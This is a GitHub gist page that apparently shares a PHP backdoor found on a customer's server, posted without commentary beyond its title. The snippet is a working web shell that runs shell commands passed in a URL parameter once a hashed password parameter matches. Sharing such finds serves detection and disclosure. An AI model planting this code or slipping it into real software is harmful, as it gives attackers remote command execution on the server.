Skip to content

Instantly share code, notes, and snippets.

@jonaslejon
Last active December 12, 2015 15:10
Show Gist options
  • Save jonaslejon/27600fdca346b36f7eab to your computer and use it in GitHub Desktop.
Save jonaslejon/27600fdca346b36f7eab to your computer and use it in GitHub Desktop.
Backdoor found at customer site
<?php
if (substr(md5($_GET["localdate"]),0,6) == "6fbcb8") {
$time = str_replace("@"," ",$_GET["localtime"]);
@system($time); exit;
}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment